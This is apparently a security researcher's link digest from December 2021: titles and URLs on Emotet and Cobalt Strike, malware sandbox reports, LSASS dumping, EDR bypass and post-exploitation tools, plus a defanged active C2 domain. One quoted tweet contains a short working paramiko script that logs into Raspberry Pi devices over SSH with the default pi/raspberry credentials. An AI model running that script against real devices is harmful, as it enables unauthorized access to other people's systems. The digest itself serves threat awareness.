Cryptolaemus on Twitter: "🚨🚨WARNING 🚨🚨 We have confirmed that #Emotet is dropping CS Beacons on E5 Bots and we have observed the following as of 10:00EST/15:00UTC. The following beacon was dropped: https://t.co/imJDQTGqxV Note the traffic to lartmana[.]com. This is an active CS Teams Server. 1/x" / Twitter
https://twitter.com/Cryptolaemus1/status/1468266929014157316![Cryptolaemus on Twitter: "🚨🚨WARNING 🚨🚨 We have confirmed that #Emotet is dropping CS Beacons on E5 Bots and we have observed the following as of 10:00EST/15:00UTC. The following beacon was dropped: https://t.co/imJDQTGqxV Note the traffic to lartmana[.]com. This is an active CS Teams Server. 1/x" / Twitter](/image/screenshot/71e4eb22f5df2db34944900257b5f9b2.webp)
Windows 10 RCE: The exploit is in the link | Positive Security
https://positive.security/blog/ms-officecmd-rce
Triage | Malware sandboxing report by Hatching Triage
https://tria.ge/211208-w82cbaabcm
The hidden side of Seclogon part 2: Abusing leaked handles to dump LSASS memory
https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html
Robo Shadow Alerts on Twitter: "Potentially Critical CVE Detected! CVE-2021-38759 Description: Raspberry Pi OS through 5.10 has the raspberry default password for the pi accou... CVSS: 8.99 #raspberrypi #raspberry_pi_3_model #CVE #CyberSecurity #DataBreach" / Twitter
https://twitter.com/robo_alerts/status/1468339806266662912
GitHub - xforcered/xPipe: Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions
https://github.com/xforcered/xPipe
When old friends meet again: why Emotet chose Trickbot for rebirth - Check Point Research404 Not FoundBack ButtonSearch IconFilter Icon
https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/
Process Ghosting | Pentest Laboratories
https://pentestlaboratories.com/2021/12/08/process-ghosting/
GitHub - wavestone-cdt/EDRSandblast
https://github.com/wavestone-cdt/EdrSandblast
Dave Brown on Twitter: "... https://t.co/HSW2MkSr5n" / Twitter
https://twitter.com/dave_brown24/status/1468396443442552838
GitHub - PwCUK-CTO/ScatterBee_Analysis: Scripts to aid analysis of files obfuscated with ScatterBee.
https://github.com/PwCUK-CTO/ScatterBee_Analysis
Triage | Malware sandboxing report by Hatching Triage
https://tria.ge/211207-t5l24sbean
Classe de vulnérabilités en environnement Active Directory – CERT-FR
https://www.cert.ssi.gouv.fr/dur/CERTFR-2021-DUR-001/
Triage | Malware sandboxing report by Hatching Triage
https://tria.ge/211208-z4bgwahdg3/
GitHub - jas502n/Grafana-CVE-2021-43798: Grafana Unauthorized arbitrary file reading vulnerability
https://github.com/jas502n/Grafana-CVE-2021-43798
Diving in to Spooler: Discovering LPE and RCE Vulnerabilities in Windows Printer - YouTube
https://youtu.be/fOUOFGdiNTA
@[email protected] on Twitter: "#POC - CVE-2021-38759 - Tested on latest import paramiko import sys h=sys.argv[1] u="pi" p="raspberry" c=paramiko.client.SSHClient() c.set_missing_host_key_policy(paramiko.AutoAddPolicy()) c.connect(h,username=u,password=p) i,o,e=c.exec_command("id") print(o\.read()) c.close()" / Twitter
https://twitter.com/netspooky/status/1468603668266209280![@netspooky@haunted.computer on Twitter: "#POC - CVE-2021-38759 - Tested on latest import paramiko import sys h=sys.argv[1] u="pi" p="raspberry" c=paramiko.client.SSHClient() c.set_missing_host_key_policy(paramiko.AutoAddPolicy()) c.connect(h,username=u,password=p) i,o,e=c.exec_command("id") print(o\.read()) c.close()" / Twitter](/image/screenshot/05f473889a159b6392956fbadda0f290.webp)
Google Disrupts Blockchain-based Glupteba Botnet; Sues Russian Hackers
https://thehackernews.com/2021/12/google-disrupts-blockchain-based.html
Peeling away the layers of obfuscation from Excel VBA to dll | PC's Xcetra Support
https://pcsxcetrasupport3.wordpress.com/2021/12/07/peeling-away-the-layers-of-obfuscation-from-excel-vba-to-dll/
PSBits/IFilter at master · gtworek/PSBits · GitHub
https://github.com/gtworek/PSBits/tree/master/IFilter
MalwareBazaar | Browse Checking your browser
https://bazaar.abuse.ch/sample/3f13e9bc8011c8bc8f3d7cb9a616ed6da1b6f16d9fcaa65d29d81caf2d5574d3/
Emotet now drops Cobalt Strike, fast forwards ransomware attacks
https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/
Zero-Point Security
https://www.zeropointsecurity.co.uk/red-team-ops/purchase
Warning: Yet Another Bitcoin Mining Malware Targeting QNAP NAS Devices
https://thehackernews.com/2021/12/warning-yet-another-bitcoin-mining.html
SANS Holiday Hack Challenge & KringleCon 2022 | SANS Institute
https://sans.org/holidayhack
FIN13: A Cybercriminal Threat Actor Focused on Mexico | Mandiant
https://www.mandiant.com/resources/fin13-cybercriminal-mexico
GitHub - BC-SECURITY/Empire: Empire is a PowerShell and Python 3.x post-exploitation framework.
https://github.com/BC-SECURITY/Empire
Chinese State-Sponsored Cyber Espionage Activity Supports Expansion of Regional Power and Influence in Southeast Asia
https://www.recordedfuture.com/chinese-state-sponsored-cyber-espionage-expansion-power-influence-southeast-asia/
Leonardo Puglisi on Twitter: "#BREAKING: The Fox News Christmas Tree is on fire in NYC https://t.co/xfWdFgdQIS" / Twitter
https://twitter.com/Leo_Puglisi6/status/1468458890052333568
The Cyber Startup Observatory - The Global Cyber Innovation Network
https://cyberstartupobservatory.com
Hacking the US Government - Legally - GovInfoSecurity
https://www.govinfosecurity.com/hacking-us-government-legally-a-18076
Exploiting Windows COM/WinRT ServicesExploiting Windows COM/WinRT Services - YouTube
https://youtu.be/KeQ0PHrHDVs
InfoSec Handlers Diary Blog - SANS Internet Storm Center
https://i5c.us/d28108
Grafana releases security patch after exploit for severe bug goes public
https://therecord.media/grafana-releases-security-patch-after-exploit-for-severe-bug-goes-public/
Cyber Security Training Events | SANS Institute
https://www.sans.org/u/1hWH
Ringzer0 - WORKSHOPS
https://ringzer0.training/workshops.html
Windows Heap-backed Pool: The Good, the Bad, and the Encoded - YouTube
https://m.youtube.com/watch?v=VvxNc8GTFfk
Moobot botnet spreading via Hikvision camera vulnerability
https://www.bleepingcomputer.com/news/security/moobot-botnet-spreading-via-hikvision-camera-vulnerability/
Resources for Retired Events Links | 6Connex Event Tech
https://securityweek.6connex.com/event/SecuritySummit/en-us#!/Auditorium/n1350713
This Small Tech Company SpiffyTech May Actually Be a Ransomware Front Group
https://www.thedailybeast.com/this-small-tech-company-spiffytech-may-actually-be-a-ransomware-front-group
Malware-Traffic-Analysis.net - 2021-11-30 (Tuesday) - Emotet epoch4 uses appinstaller for infection
https://www.malware-traffic-analysis.net/2021/11/30/index.html